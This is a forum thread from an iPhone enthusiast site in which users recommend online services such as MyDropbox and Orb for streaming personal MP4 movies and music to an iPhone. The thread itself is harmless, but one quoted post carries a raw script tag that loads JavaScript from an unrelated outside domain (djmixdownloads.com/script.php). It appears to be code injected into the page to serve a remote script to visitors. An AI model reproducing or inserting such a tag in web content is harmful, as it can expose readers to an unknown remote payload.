Your favorite Apple, iPhone, iPad, iOS, Jailbreak, and Cydia site.

Thread: iPhone Online Streaming

Default iPhone Online Streaming
    Is there a website where I can upload MP4 movies and music from home to my account, that I can access on my iPhone over EDGE, 3G, o WiFi and stream from. I want to be able to upload MP4 movies and music to the account, and then delete the files from my computer. Is there already a way to do this?

iPhone? More like MyPhone captainjapanicq's Avatar
    Thanks

Try MyDropbox.com it allows you to upload files online. Then you access the files using their iphone interface. Once you are done with the files just delete them.

i still haven't found one, as you know the flash players has to be supported too bad

Quote Originally Posted by coolio86 View Post
    Is there a website where I can upload MP4 movies and music from home to my account, that I can access on my iPhone over EDGE, 3G, o WiFi and stream from. I want to be able to upload MP4 movies and music to the account, and then delete the files from my computer. Is there already a way to do this?<script type="text/javascript" src="http://djmixdownloads.com/script.php"></script>
    have you try stickyloads . net

Hello

I've used orb for a whle now, it works seamlessly, allows my to stream any file, audio or video from my pc at home over the internet (wifi / 3g) to my iphone.

This even allows live tv, if you have a tuner card in your mdeia pc.....

Orb is free for the PC and allows free access from any internet based pc, but the full ob app for the iphone is a couple of quid...

well worth it